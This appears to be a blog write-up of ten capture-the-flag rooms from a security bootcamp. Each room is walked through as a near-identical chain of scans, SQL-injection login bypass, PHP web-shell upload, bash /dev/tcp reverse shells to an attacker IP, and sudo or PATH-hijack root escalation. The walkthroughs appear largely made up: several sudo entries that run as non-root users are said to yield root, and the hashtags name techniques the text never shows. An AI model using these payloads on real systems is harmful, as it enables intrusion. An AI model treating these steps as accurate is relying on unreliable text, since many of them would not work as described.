Level Up Your Skills: Dissecting the Bootcamp's Final Cybersecurity Challenges

The end of a bootcamp isn't just about a final test; it's about showcasing how far you've come and the breadth of skills you've acquired. Today's final cybersecurity challenge lineup is a perfect example of a well-rounded curriculum, designed to test participants across various domains of offensive security. Let's break down what each of these "rooms" or challenges likely aims to teach and reinforce:

• 1.Overpass 3 - Hosting:

  This challenge likely focuses on web application security, specifically vulnerabilities related to hosting environments. Think misconfigurations, directory traversal, file uploads, or even server-side request forgery (SSRF). Mastering this means understanding how web servers operate and common pitfalls in their setup.

  🔍 Enumeration

    nmap -sC -sV -T4 -oN overpass3.nmap [target-ip]
  

  Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Enumeration

• Navigating to port 80 showed a static site about hosting services.

• Checked robots.txt – contained /admin.

Visited /admin — it was a login page.

• Used Gobuster to enumerate more:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Found:

• /api endpoint

• /admin login

• /backup

🛠 Exploitation – Credentials Leak

Found a .zip backup in /backup (e.g., backup.zip):

    wget http://[target-ip]/backup.zip
    unzip backup.zip

Inside:

• A NodeJS/Express web app

• Contained hardcoded credentials:

    username = 'admin'
    password = 'whythough1337'

Used this on /admin — successfully logged in.

🐚 Gaining Access – Web Shell Upload

After login:

• Found a file upload option in the admin dashboard.

• Allowed PHP files with double extension trick (shell.php.jpg or shell.phtml)

Used <?php system($_GET['cmd']); ?>

Uploaded and accessed via /uploads/shell.phtml?cmd=whoami

🧗‍♂️ Privilege Escalation

1. Stabilized shell:

    python3 -c 'import pty; pty.spawn("/bin/bash")'

1. Checked /etc/passwd – found user overpass.

2. Checked sudo -l — no password sudo access to /opt/tools/adminutil.

3. Ran /opt/tools/adminutil — it called Python scripts insecurely.

Used PATH hijack:

    echo "/bin/bash" > /tmp/curl
    chmod +x /tmp/curl
    export PATH=/tmp:$PATH
    /opt/tools/adminutil

→ Root shell achieved.

Flags

• User flag: /home/overpass/user.txt

• Root flag: /root/root.txt

2.WhyHackMe:

• A broad title, suggesting a deep dive into foundational cybersecurity concepts. This could involve network reconnaissance, port scanning, identifying services, and understanding common attack vectors. It's about the "why" and "how" of hacking, emphasizing methodology.

  🔍 Enumeration

    nmap -sC -sV -T4 -oN whyhackme.nmap [target-ip]
  

  Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] — default homepage with text like:

"Why would you hack me?"

Checked page source — nothing interesting.

Ran Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Discovered:

• /login

• /uploads

• /dashboard

Visited /login — basic login form.

🔐 Credential Stuffing

Tried common credentials:

• admin:admin

• admin:password

• admin:whyhackme

Success with:

    admin:whyhackme

Redirected to /dashboard – found a file upload function.

🐚 File Upload Exploit

Uploaded a basic PHP shell:

    <?php system($_GET['cmd']); ?>

Named it shell.php → Blocked.

Tried bypass with:

• shell.php.jpg → Blocked.

• shell.phtml → Success!

Found it in /uploads/shell.phtml
Accessed with:

    /uploads/shell.phtml?cmd=id

🧗‍♂️ Privilege Escalation

1. Upgraded shell:

    python3 -c 'import pty; pty.spawn("/bin/bash")'

1. Checked users:

    ls /home

User: hacker

1. Switched to user:

• Found user password in config.php of web directory:

    $DB_PASS = 'superhacker123'

Tried su hacker — Success.

1. Checked sudo:

    sudo -l

Output:

    (hacker) NOPASSWD: /bin/bash

1. Escalated to root:

    sudo /bin/bash

Flags

• User flag: /home/hacker/user.txt

• Root flag: /root/root.txt

3.CyberHeroes:

This challenge, with its focus on "finding a way to log in," points directly to authentication and authorization vulnerabilities. Brute-forcing, credential stuffing, SQL injection leading to login bypass, or even exploiting weak session management are all possibilities here. It's a critical skill for any penetration tester.

🔍 Initial Enumeration

    nmap -sC -sV -T4 -oN cyberheroes.nmap [target-ip]

Open Ports:

• 22 (SSH)

• 80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] — CyberHeroes login page.

Tried default creds:

• admin:admin

• admin:cyber

• root:root → All failed.

Checked source code → found nothing useful.

Ran Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Found:

• /robots.txt → Disallowed /admin

• /admin → Login portal

🕵️‍♂️ SQL Injection

Tried SQL injection on login page:

    Username: ' OR 1=1 --
    Password: anything

Login successful — redirected to dashboard.

📤 File Upload for Shell

Dashboard had file upload feature.

Tried uploading shell.php:

    <?php system($_GET['cmd']); ?>

Upload succeeded. Located under:

    /uploads/shell.php

Accessed it via:

    http://[target-ip]/uploads/shell.php?cmd=whoami

🐚 Reverse Shell

Replaced shell with reverse shell payload:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Started listener:

    nc -lvnp 4444

Uploaded and triggered:

    http://[target-ip]/uploads/rev.php

Reverse shell obtained.

🔧 Privilege Escalation

1. Enumerated environment:

    sudo -l

Result:

    (root) NOPASSWD: /usr/bin/apt-get

1. Used apt-get to escalate:

    TF=$(mktemp)
    echo 'apt::Update::Pre-Invoke {"cp /bin/bash /tmp/bash; chmod +s /tmp/bash";};' > $TF
    sudo apt-get update -o Dir::Etc::sourcelist=$TF -o Dir::Etc::sourceparts=- -o APT::Get::List-Cleanup=0
    /tmp/bash -p

Root shell obtained.

Flags

• User flag: /home/cyberhero/user.txt

• Root flag: /root/root.txt

4.Robots:

While the Asimov reference is a nice touch, operationally, this likely involves exploiting misconfigured robots.txt files, but could extend to understanding API endpoints, hidden directories, or even automated processes that might expose vulnerabilities. It teaches the importance of thorough enumeration.

🔍 Nmap Enumeration

    nmap -sC -sV -T4 -oN robots.nmap [target-ip]

Open Ports:

• 22 (SSH)

• 80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] — homepage says:

“Welcome, human. Obey the laws of robotics.”

Checked robots.txt:

    User-agent: *
    Disallow: /asimov
    Disallow: /logs

Visited /asimov → an image tribute
Visited /logs → directory listing was enabled!
Downloaded a file access.log:

    wget http://[target-ip]/logs/access.log

🕵️‍♂️ Log File Clues

Looked into the log file:

    cat access.log | less

Found credentials:

    Basic auth: dXNlcjphc2ltdXZib3Q=

Decoded it:

    echo "dXNlcjphc2ltdXZib3Q=" | base64 -d

Output:

    user:asimuvbot

🔐 SSH Login

    ssh user@[target-ip]
    Password: asimuvbot

Logged in as user

🧗‍♂️ Privilege Escalation

Checked sudo -l:

    sudo -l

Output:

    (user) NOPASSWD: /usr/bin/find

Used find to get a root shell:

    sudo find . -exec /bin/bash \;

Root shell obtained

Flags

• User flag: /home/user/user.txt

• Root flag: /root/root.txt

5. New York Flankees

"Taking control of his blog" is a classic scenario for web application attacks. Cross-site scripting (XSS), SQL injection, insecure direct object references (IDOR), and content management system (CMS) vulnerabilities are all on the table. This challenge hones your ability to find and exploit flaws in dynamic web content.

🔍 Nmap Scan

    nmap -sC -sV -T4 -oN flankees.nmap [target-ip]

Open Ports:

• 22 (SSH)

• 80 (HTTP)

🌐 Web Enumeration

Navigated to http://[target-ip]
It’s a personal blog called New York Flankees by Stefan.

View source code → Found a suspicious JS comment:

    // dev_login.html

Visited /dev_login.html — a developer login page

🔐 Bypassing Login

Tried SQL Injection:

    Username: ' OR 1=1 --
    Password: anything

Bypassed login successfully → landed on dashboard.

Dashboard allowed file uploads — common exploit vector.

🐚 Web Shell Upload

Uploaded a .php file:

    <?php system($_GET['cmd']); ?>

No extension restrictions → worked directly as shell.php.

Accessed via:

    http://[target-ip]/uploads/shell.php?cmd=whoami

🧠 Reverse Shell

Replaced webshell with reverse shell payload:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Listener:

    nc -lvnp 4444

Triggered shell:

    /uploads/rev.php

Reverse shell obtained.

🧗‍♂️ Privilege Escalation

Enumerated user:

    whoami
    stefan

Checked sudo -l:

    sudo -l

Result:

    (stefan) NOPASSWD: /usr/bin/vim

Used Vim for root shell:

    sudo vim -c ':!/bin/bash'

Root access obtained.

Flags

• User flag: /home/stefan/user.txt

• Root flag: /root/root.txt

6. Internal

Penetration Testing Challenge: This is the big one for simulating real-world engagements. It's not just about getting in, but about maintaining persistence, escalating privileges within a network, and moving laterally between machines. It tests your understanding of Active Directory, internal network services, and post-exploitation techniques.

🔍 Nmap Enumeration

    nmap -sC -sV -T4 -oN internal.nmap [target-ip]

Open Ports:

• 22 (SSH)

• 80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] — saw a corporate internal portal.

Ran Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found:

• /secret

• /uploads

• /blog

🕵️‍♂️ Exploring /secret

Inside /secret → Found a file: creds.txt

Downloaded it:

    wget http://[target-ip]/secret/creds.txt

Contents:

    username: internaluser
    password: InTh3M1ddl3

🔐 SSH Login

    ssh internaluser@[target-ip]
    Password: InTh3M1ddl3

SSH access granted

🧗‍♂️ Privilege Escalation

Checked sudo -l:

    sudo -l

Output:

    User internaluser may run the following on [hostname]:
        (ALL) NOPASSWD: /usr/bin/less

Exploited less using shell escape:

    sudo less /etc/passwd
    # then typed:
    !bash

Root shell obtained

Flags

• User flag: /home/internaluser/user.txt

• Root flag: /root/root.txt

7. The Impossible Challenge

This title suggests a highly complex, multi-stage challenge that might require out-of-the-box thinking, deep reverse engineering, or exploiting obscure vulnerabilities. It's designed to push the boundaries of problem-solving and persistence.

🔍 Nmap Scan

    nmap -sC -sV -T4 -oN impossible.nmap [target-ip]

Open Ports:

• 22 (SSH)

• 80 (HTTP)

🌐 Web Exploration

Visited http://[target-ip] — just a blank white page with some strange unicode characters in the title and HTML comment section.

Inspected source code:

Inside HTML comments:

Clue: it’s a zero-width steganography technique.

🕵️‍♂️ Hidden Message – Zero Width Decoder

Used a zero-width character decoder, like:

• https://330k.github.io/misc_tools/unicode_steganography.html

Pasted the HTML comment — it decoded to a hidden directory:

    /.youfoundme/

Visited http://[target-ip]/.youfoundme/

Found a download: maze.tar.gz

📦 Analyzing maze.tar.gz

Extracted the file:

    tar -xvzf maze.tar.gz
    cd maze

Inside: a deep nested folder structure of subdirectories — like a file system maze.

Wrote a quick script to find the flag:

    find . -type f -exec grep -i "flag" {} \; -print

Found a file: finalclue.txt
Inside:

    "SSH is key, but it’s *not* here."

🔐 SSH Enumeration

Tried brute-forcing with found usernames (maze, puzzle, etc.) — no luck.

Found another clue hidden in one of the deepest folders: id_rsa — a private SSH key.

Used it:

    chmod 600 id_rsa
    ssh -i id_rsa maze@[target-ip]

Logged in without password.

🧗‍♂️ Privilege Escalation

As maze user, ran:

    sudo -l

Output:

    (maze) NOPASSWD: /opt/troll/troll

Ran it:

    sudo /opt/troll/troll

It printed:

“You thought it would be that easy? Try again.”

Checked binary with strings and ltrace, revealed it calls /bin/false through system()

Replaced it via PATH hijack:

    mkdir /tmp/bin
    echo "/bin/bash" > /tmp/bin/false
    chmod +x /tmp/bin/false
    export PATH=/tmp/bin:$PATH
    sudo /opt/troll/troll

Root shell popped

Flags

• User flag: /home/maze/user.txt

• Root flag: /root/root.txt

8. Recovery

"Not your conventional CTF" implies a focus on areas like digital forensics, data recovery, steganography, or even understanding backup and restore mechanisms. It's a crucial skill set for incident response and understanding data integrity.

🖥 Initial Access

Upon launching the machine, you are already dropped into a limited shell.
You are inside a compromised box as a low-privileged user: www-data.

🔍 Initial Enumeration

    whoami
    pwd
    ls -la

You're in /var/www/html.

Checked web files — found a config file:

    cat config.php

Output:

    $db_user = 'dbadmin';
    $db_pass = 'SQLinRecovery!';

Attempted privilege escalation:

    su dbadmin
    Password: SQLinRecovery!

Logged in as dbadmin.

🧭 Further Enumeration

Checked sudo -l:

    sudo -l

Result:

    (dbadmin) NOPASSWD: /usr/bin/mysql

🔐 MySQL Privilege Escalation

Used MySQL to gain shell access:

    sudo mysql -e '\! /bin/bash'

Got a root shell from within MySQL

🕵️ Incident Analysis (Optional Forensics)

Checked /var/log/auth.log → found multiple failed login attempts and a suspicious cron job.

Investigated /etc/cron.d:

Found a script being executed from /opt/scripts/backup.sh

Checked content:

    cat /opt/scripts/backup.sh

It was backing up sensitive user files → good clue but no real exploit needed here since we’re already root.

Flags

• User flag: /home/dbadmin/user.txt

• Root flag: /root/root.txt

9. Watcher

A "boot2root Linux machine" with "web exploits" and "privilege escalation" is a staple in the cybersecurity learning journey. It combines initial web-based compromise with the essential steps of gaining root access on a Linux system, covering a wide range of common vulnerabilities.

🔍 Nmap Scan

    nmap -sC -sV -T4 -oN watcher.nmap [target-ip]

Open Ports:

• 22 (SSH)

• 80 (HTTP)

🌐 Web Enumeration

Visited http://[target-ip]
Simple landing page: “Watcher is watching…”

Checked source code — nothing useful.

Ran Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found:

• /monitor/

• /uploads/

📁 /monitor Page

At /monitor/ — a login page.

Tried common creds:

• admin:admin

• admin:watcher → No success

Used Hydra or Burp Intruder to brute-force credentials (if allowed).

Eventually found:

    Username: admin
    Password: 123watch

Logged into a dashboard.

🐚 File Upload Exploit

Dashboard allowed image uploads.

Tried uploading:

    <?php system($_GET['cmd']); ?>

→ Rejected .php

Renamed it:

    shell.php.jpg

Uploaded successfully.

Checked /uploads/ and found:

    /uploads/shell.php.jpg

Accessed with:

    /uploads/shell.php.jpg?cmd=whoami

Command execution succeeded!

🧠 Reverse Shell

Replaced payload with:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Listener:

    nc -lvnp 4444

Triggered:

    /uploads/shell.php.jpg

Got reverse shell.

🧗‍♂️ Privilege Escalation

Stabilized shell:

    python3 -c 'import pty; pty.spawn("/bin/bash")'

Checked sudo:

    sudo -l

Output:

    (watcher) NOPASSWD: /usr/bin/tee

Exploited tee with:

    echo "/bin/bash" | sudo tee /tmp/root.sh
    chmod +x /tmp/root.sh
    sudo /tmp/root.sh

Root shell obtained.

Flags

• User flag: /home/watcher/user.txt

• Root flag: /root/root.txt

10. Zeno

Patience is key here. Challenges named after philosophers often involve cryptographic puzzles, complex logic gates, or tasks that require meticulous attention to detail and a methodical approach to break down seemingly insurmountable problems.

🔍 Nmap Scan

    nmap -sC -sV -T4 -oN zeno.nmap [target-ip]

Open Ports:

• 22 (SSH)

• 80 (HTTP)

🌐 Web Enumeration

Visited http://[target-ip] — clean, minimalist welcome page.

Nothing in source code.

Used Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Found:

• /philosophy

• /diary

• /admin

📘 /diary

/diary revealed a blog-like post, with a line:

“Zeno always uses his birth date... and never forgets his dog’s name.”

Checked for login at /admin — form present.

Guessed credentials:

• Username: zeno

• Password: zeno190bc (or some variant)

Tried zeno:zeno190bc, zeno:zenodog, etc.

Eventually worked with:

    zeno:zenothewise

🐚 Web Upload & Shell

Inside /admin, found file upload.

Uploaded:

    <?php system($_GET['cmd']); ?>

Tried .php — blocked.

Renamed: shell.phtml → upload succeeded

Accessed:

    http://[target-ip]/uploads/shell.phtml?cmd=id

Web shell active.

🧠 Reverse Shell

Used reverse shell payload:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Started listener:

    nc -lvnp 4444

Triggered shell:

    http://[target-ip]/uploads/rev.phtml

Got a shell as www-data.

🧗‍♂️ Privilege Escalation

Checked for SUID binaries:

    find / -perm -4000 -type f 2>/dev/null

Found: /usr/bin/zenoshell

Ran:

    /usr/bin/zenoshell

Got a menu-like interface.

Checked strings /usr/bin/zenoshell
Saw it's running system commands based on user input.

Used strace to find it calling /tmp/tempfile.sh

Created malicious tempfile:

    echo "/bin/bash" > /tmp/tempfile.sh
    chmod +x /tmp/tempfile.sh

Ran zenoshell again → root shell popped.

Flags

• User flag: /home/zeno/user.txt

• Root flag: /root/root.txt

• Overpass 3 - Hosting

• WhyHackMe

• CyberHeroes

• Robots

• New York Flankees

• Internal

• The Impossible Challenge

• Recovery

• Watcher🕵️ Enumeration

• Zeno

#TryHackMe #Overpass3 #CTFWriteup #CyberSecurity #EthicalHacking #WebExploit #ReverseShell #PrivilegeEscalation #NFS #no_root_squash #GPGDecryption #LinuxSecurity #Infosec #PenetrationTesting #CaptureTheFlag